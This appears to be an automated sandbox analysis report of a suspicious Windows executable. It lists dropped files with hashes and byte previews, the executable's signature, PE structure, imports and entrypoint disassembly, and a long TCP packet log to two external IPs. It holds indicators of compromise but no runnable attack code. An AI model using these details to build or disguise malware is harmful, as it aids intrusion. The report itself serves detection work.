File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7023448
Entropy (8bit):	7.999671865017346
Encrypted:	true
SSDEEP:	196608:IOo15Bi1rinyauHdombrIhk7hE/nB0e262m:In15BWenq3Gk9SBT2m
MD5:	7BAEBABAB6F0CA7B143068FDC17DFA41
SHA1:	A6EA175976EDBDEEDDFBFB65E64D9D1CFDED84A1
SHA-256:	69C3380CE171917E412D288C47E895E2F5F3036D1F24A80883A97A7B960BCF7D
SHA-512:	D8DD456E59B002A8B25C6D09CB8B7F485F7C2F5F636D520227C693DE6C8BA571AA4CAE16E4E10ACB764AF31E4C34E048DD157075B7267A3EAE9214D8AD293528
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........K...K...K......D...K..!......_......J......J...RichK...................PE..L...Hn.@.................x...........X... ........... ................................k.......... .......................... .........................j.X=...........!............................................... ...............................text...`w... ...x.................. ..`.data................\|..............@....rsrc............pj..~..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\ProgramData\lua\luac.exe
File Type:	Microsoft Cabinet archive data, 61020 bytes, 1 file
Category:	dropped
Size (bytes):	61020
Entropy (8bit):	7.994886945086499
Encrypted:	true
SSDEEP:	1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
MD5:	2902DE11E30DCC620B184E3BB0F0C1CB
SHA1:	5D11D14A2558801A2688DC2D6DFAD39AC294F222
SHA-256:	E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
SHA-512:	EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
Malicious:	false
Preview:	MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.\|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xWS.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)............o..~4.6.......p.`Bt.(..V.N.!.p.C>..%.ySXY.>.`..f\|....'^K`\..e......j/..\|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...,.....7F$..~..S.6$S.-y....\|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\ProgramData\lua\luac.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.1009447448862772
Encrypted:	false
SSDEEP:	6:kK1doW+N+SkQlPlEGYRMY9z+4KlDA3RUeIlD1Ut:v5kPlE99SNxAhUe0et
MD5:	DF74FA8A422E1547A06AC1BF6A4BFD4A
SHA1:	6C583286769CE39A2008D73CD6645B035CE0618B
SHA-256:	39B420EAD254337235F417BF1A60B55D8C52C489C515BF2F71755C9A40C18337
SHA-512:	0FD250B83BE528D8B0D422AD016FAC516CB291CE0D074C52232F451B5FB750EC0A903099FD578C16E68146056972E751506F5496E75A8C747CF342259AF0E6E7
Malicious:	false
Preview:	p...... ........t..aCw..(....................................................... .........T'._......$...........\...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.6.5.4.2.7.7.5.f.d.7.1.:.0."...

C:\Windows\Temp\2021-07-12-10-29-42.zip Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16124619
Entropy (8bit):	7.9944810060125
Encrypted:	true
SSDEEP:	393216:EadeYGLjbzQFXlVztghnnFwOFOkbdJH/YNS2:EOeYwP89WNnFwOFHz/C
MD5:	55A7B6D67A84D10B92E16D895836F217
SHA1:	E986E07D63D2CACE57E6C381003F53324FA3F538
SHA-256:	28BA69E0AB3C3E6AEA6BE35A33B09D52ED313C5318145AB3CF07E4E1C5BC2825
SHA-512:	ECC5B9D6695CF6F030ED2B92E4145B590B401B326310353C78686AEDF01FCBEADC87C44701F99583BD2897FF6CF46B7969E5039795CA01D2539AB1D1632FC75F
Malicious:	false
Preview:	PK........JnrR................ShellExperienceHost/PK.........\|lR..c%...8-..3...ShellExperienceHost/api-ms-win-core-file-l1-2-0.dll.Y.<T[....f...}D)2...."d...&.L3cMe...J......Z.WR.....G..$.DI.R.......[~.p.=.w...~.;.{.;...... ,..>@.qh.XC.\...^&....h.G..hxE2.$6.....BiL&.G...8.L..I.s.$...dII............:..g>..i.O.....t......D.>......R.P.CE.a.sh"I.-5^H.....^SP.m4....:T.A.h^....Q...;....6....5f....3... S..m...B..x4..F......5.'s..Ph.6...'r..../..2.g..1.u.8PE>..5....@..7...~.%.....A..\....z........P.A....M.....;..f..p...L.P.......ES..z09,:....i<...R.(:.I.6...2..</z..........oVtl.}.-........X&..`...e...D7"...C.1.~Q......k.u~e.P..B.u..?..'.......Q."..zp.+F......B"..58N..Z0.a..^:f.G...>....m..E.;..........^P.<...?...-..>....PL..\|.1.c...'......h9An..@;...h#..... :...6{.n5........(...q .." .p......!..)Ed.....3..v.H..m.L..h@>.XC..]...h..8...j8...H..[x...........F......4{D.)6.f.{.6..P.h..k\@.$.5F.7...it<.XN.V..P.6.0...z`&.........Q.....B....y...s0..D.yz..

\Device\ConDrv Download File
Process:	C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	241
Entropy (8bit):	4.98221783813843
Encrypted:	false
SSDEEP:	6:zx3McKz7r4MFDdO1BXVNYL2+5oeXJ6OvskDKsTGN8e:zKcQJF6BFNYL2GzsIsKKsTGNT
MD5:	9A34B9D907895EA2C410AFBC489723BB
SHA1:	DF814204A14636E4953B984C31237B26BD350882
SHA-256:	777650EE106B866CC7CB8E70C9DECC28E607793F5F84F42BF54978A8115DBF6C
SHA-512:	7B833ABF2F8EB969ED94A3100D39C6FCE0A8FC8C5A50302F7C97C6A6364EBD26A0FEC77A9C310F155C88EAFF6CD8C049A123819188C7FB12EDF532E0A0539607
Malicious:	false
Preview:	Microsoft (R) CoreCLR Native Image Generator - Version 5.1.50918.0..Copyright (c) Microsoft Corporation. All rights reserved.....Native image C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\mscorlib.ni.dll generated successfully...

Static File Info

General
File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.557597729134795
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	WhQZ6UbCEY.exe
File size:	2189056
MD5:	76de16ed705561ad6ff55fd578660c91
SHA1:	232af3b6a96ead34c18607a81b5f7af14763195a
SHA256:	75e03f40a088903579a436c0d8e8bc3d0d71cf2942ad793cc948f36866a2e1ad
SHA512:	a631e5ece2a6e947377d1b72aa3dd12a1dd0964b5c677d498344d50693559643b28c45eff0108530c9a8a7ddb751ae67b02a1b04e71b31e98c5c23bec7f0ca26
SSDEEP:	49152:uH3vF85FshhD4ggDZ7tPBdhC4dQnnwVc64u2:AFWPBFdQnnwG6e
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%...v...v...v...w...v...w...v...w3..v...w...v...w...v...w...v...w...v...v...v...w...v...w...v...v...v..cv...v...v...v...w...

File Icon


Icon Hash:	f08e9ee6b6da78b1

Static PE Info

General
Entrypoint:	0x1400de3cc
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp:	0x60CAC5FC [Thu Jun 17 03:48:12 2021 UTC]
TLS Callbacks:	0x400a9170, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	db7948f7bb94c20ceb8e0b74d33d72f3

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	9/5/2018 5:00:00 PM 10/5/2021 4:59:59 PM
Subject Chain	CN="Happytuk Co.,Ltd.", O="Happytuk Co.,Ltd.", L=New Taipei City, C=TW
Version:	3
Thumbprint MD5:	149631E9F9C18C19301B7EF10CA47FB8
Thumbprint SHA-1:	8CE020AA874902C532B9911A4DCA8EFFA627DC80
Thumbprint SHA-256:	F78DE1E59DF2EAC7901D4FA7D66E9818204A5C4C9B630BB2FF9439C2DEA8B5B5
Serial:	0ED4DF1033393FF2AF41C571A6AA19D7

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F76BCBCAEF0h
dec eax
add esp, 28h
jmp 00007F76BCBCA757h
int3
int3
int3
int3
int3
int3
int3
int3
nop word ptr [eax+eax+00000000h]
dec eax
sub esp, 10h
dec esp
mov dword ptr [esp], edx
dec esp
mov dword ptr [esp+08h], ebx
dec ebp
xor ebx, ebx
dec esp
lea edx, dword ptr [esp+18h]
dec esp
sub edx, eax
dec ebp
cmovb edx, ebx
dec esp
mov ebx, dword ptr [00000010h]
dec ebp
cmp edx, ebx
jnc 00007F76BCBCA8F8h
inc cx
and edx, 8D4DF000h
wait
add al, dh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1fd5a0	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20d000	0x56f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x204000	0x7500	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x215a00	0xd00	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x213000	0x6e98	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1fabe0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1fae00	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1fac40	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xee000	0x598	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xece50	0xed000	False	0.50811638812	data	6.22852125091	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xee000	0x11092e	0x110a00	False	0.595858945151	data	6.40601734596	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1ff000	0x4fc8	0x3c00	False	0.2572265625	data	3.53998063199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata	0x204000	0x7500	0x7600	False	0.459083686441	data	5.86496578249	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x20c000	0xf4	0x200	False	0.314453125	data	2.45397921274	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x20d000	0x56f8	0x5800	False	0.552956321023	data	5.19351440841	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x213000	0x6e98	0x7000	False	0.2578125	data	5.45286434099	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x20d400	0x4228	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x211628	0x10a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_GROUP_ICON	0x2126d0	0x22	data	English	United States
RT_VERSION	0x20d180	0x160	MIPSEB-LE ECOFF executable not stripped - version 0.79	English	United States
RT_MANIFEST	0x20d2e0	0x11d	ASCII text, with no line terminators	English	United States

Imports

DLL	Import
ntdll.dll	RtlUnwindEx, NtCancelIoFileEx, RtlLookupFunctionEntry, RtlCaptureContext, NtCreateFile, NtDeviceIoControlFile, RtlNtStatusToDosError, RtlVirtualUnwind
ADVAPI32.dll	RegCloseKey, SystemFunction036, RegQueryValueExW, RegOpenKeyExW, CreateWellKnownSid, GetTokenInformation, OpenProcessToken
CRYPT32.dll	CertDuplicateStore, CertCloseStore, CertAddCertificateContextToStore, CertEnumCertificatesInStore, CertFreeCertificateChain, CertDuplicateCertificateChain, CertVerifyCertificateChainPolicy, CertDuplicateCertificateContext, CertOpenStore, CertFreeCertificateContext, CertGetCertificateChain
KERNEL32.dll	CompareStringW, LCMapStringW, WaitForSingleObject, CloseHandle, ReleaseSRWLockExclusive, GetCurrentProcess, QueryFullProcessImageNameA, Sleep, GetSystemInfo, WakeAllConditionVariable, AddVectoredExceptionHandler, SetThreadStackGuarantee, GetLastError, GetProcessHeap, HeapAlloc, HeapFree, HeapReAlloc, SystemTimeToFileTime, GetSystemTimeAsFileTime, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, AcquireSRWLockExclusive, SwitchToThread, SetLastError, GetFinalPathNameByHandleW, TryAcquireSRWLockExclusive, CreateIoCompletionPort, SetFileCompletionNotificationModes, GetQueuedCompletionStatusEx, SetHandleInformation, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockShared, ReleaseSRWLockShared, GetEnvironmentVariableW, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, GetCurrentDirectoryW, GetCurrentThread, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, TlsAlloc, GetModuleHandleW, FormatMessageW, CreateFileW, GetFileInformationByHandle, DeviceIoControl, ReadFile, SetFilePointerEx, FindNextFileW, CreateDirectoryW, InitializeCriticalSection, TryEnterCriticalSection, LeaveCriticalSection, EnterCriticalSection, ExitProcess, QueryPerformanceCounter, QueryPerformanceFrequency, DeleteFileW, RemoveDirectoryW, FindFirstFileW, FindClose, CreateThread, WakeConditionVariable, PostQueuedCompletionStatus, SleepConditionVariableSRW, GetConsoleOutputCP, FlushFileBuffers, HeapSize, GetStringTypeW, GetFileType, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindFirstFileExW, GetCommandLineW, GetCommandLineA, GetModuleHandleExW, GetModuleFileNameW, RaiseException, LoadLibraryExW, FreeLibrary, TlsFree, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, GetStartupInfoW, IsDebuggerPresent, InitializeSListHead, GetCurrentThreadId, GetCurrentProcessId, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter
ole32.dll	CoInitializeEx, CoCreateInstance, CoUninitialize
Secur32.dll	ApplyControlToken, AcceptSecurityContext, InitializeSecurityContextW, FreeCredentialsHandle, EncryptMessage, AcquireCredentialsHandleA, QueryContextAttributesW, FreeContextBuffer, DeleteSecurityContext, DecryptMessage
SHELL32.dll	ShellExecuteExA
USER32.dll	GetForegroundWindow, GetDlgItem, SendMessageA
WS2_32.dll	getpeername, WSAGetLastError, WSAIoctl, shutdown, closesocket, WSASocketW, ioctlsocket, setsockopt, connect, getsockopt, bind, getaddrinfo, freeaddrinfo, WSAStartup, WSACleanup, recv, send, WSASend

Version Infos

Description	Data
FileVersion	0.1.0
ProductVersion	0.1.0
ProductName	bin
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 12, 2021 10:28:45.439419985 CEST	49718	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:28:45.617161036 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.644552946 CEST	80	49718	47.75.19.154	192.168.2.3
Jul 12, 2021 10:28:45.645445108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.648021936 CEST	49718	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:28:45.650501013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.650527000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.650737047 CEST	49718	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:28:45.692580938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.850517035 CEST	80	49718	47.75.19.154	192.168.2.3
Jul 12, 2021 10:28:45.850660086 CEST	49718	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:28:45.856445074 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.856475115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.856491089 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.856509924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.856594086 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.856606960 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.860049963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.860075951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.861649036 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.862030983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.865952969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.871526003 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.874881029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.876722097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.879231930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.880042076 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.880695105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.883893013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.883965015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.883997917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.884771109 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.886254072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.891326904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.891390085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.892573118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.907216072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.908924103 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.910119057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.910151958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.911602974 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.911654949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.911695957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.911736965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.911782026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.911793947 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.911819935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.911844969 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.911865950 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.911899090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.911916971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.911941051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.911973000 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.911992073 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.912040949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.912064075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.912090063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.912211895 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.912543058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.912626982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.916460991 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.916511059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.916534901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.916548967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.916563988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.916732073 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.937058926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.937086105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.937163115 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.940538883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.940566063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.940581083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.940596104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.941078901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.942682028 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.942743063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.942766905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.942785978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.942805052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.942816019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.942842007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.942848921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.942912102 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.943480968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.943701982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.944096088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.945765018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.946095943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.948435068 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.948466063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.948487043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.952804089 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.954267979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.955682993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.956371069 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.956408024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958007097 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.958043098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958065987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958084106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958100080 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958120108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958137989 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.958146095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958156109 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.958172083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958188057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958203077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958220005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958239079 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958246946 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.958262920 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958286047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958291054 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.958309889 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.958317995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958339930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.958759069 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.959477901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.959506035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.959522963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.959538937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.959554911 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.959570885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.961530924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.961564064 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.962908030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.962938070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.962954998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.962971926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.964657068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.966880083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.966911077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.966933012 CEST	80	49720	47.254.186.176	192.168.2.3
